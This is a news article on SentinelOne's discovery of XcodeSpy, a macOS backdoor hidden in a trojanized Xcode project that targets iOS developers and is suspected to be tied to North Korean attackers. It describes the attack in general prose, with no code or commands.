SentinelOne security researchers have just discovered a macOS malware targeting iOS software developers and named it XcodeSpy. This malware found in the wild is designed to infiltrate the Xcode development tool that Apple provides to developers for free.
If developers use infected Xcode to develop applications for platforms such as iOS, they are likely to inadvertently package malicious project code. Xcode is a repository of all the files, resources, and information needed to build an application.
However, security researchers discovered in the wild a Trojan horse code library that tried to install advanced surveillance malware on the developer’s macOS device. Specifically, the problem lies in a copy of the legally open-source TabBarInteraction project.
Under normal circumstances, developers can easily create interactions (such as adding animation effects to iOS tabs). In addition to legal code, XcodeSpy also includes an obscure “run script” that will be executed when the developer starts the project build.
After contacting the remote server controlled by the attacker, a customized version of EggShell will be downloaded and installed. The so-called EggShell specifically refers to an open-source backdoor that can use microphones, cameras, and keyboards to monitor target users accordingly.
Join Our Apple Channel On Telegram
SentinelOne security researcher Phil Stokes pointed out in a blog post published on Thursday that they found two customized EggShell variants. Both used a web interface from Japan to upload to VirusTotal on August 5th and October 13th, respectively, and subsequent samples were also found on the Mac terminals of American victims at the end of 2020.
Due to the need for confidentiality, SentinelOne is currently unable to provide more details about the field attack (ITW) incident. However, according to the reports of the victims, they are likely to be targets of North Korean Advanced Persistent Threats (APT) attackers again.
Fortunately, so far, researchers have only noticed one case of a field attack from an organization in the United States. However, analysis of signs shows that relevant activities will continue to be carried out at least between July and October 2020, and it is also possible to target developers in the Asian region.
In addition, two months ago, Microsoft and Google researchers both stated that hackers with North Korean backgrounds are actively trying to infect the computers of security researchers. In order to win the trust of researchers, hackers even spent several weeks carefully playing a role on Twitter.
If you like our news and you want to see such news even further, then follow RealMi Central on Telegram, Twitter, Facebook (Page) (Group) & Instagram.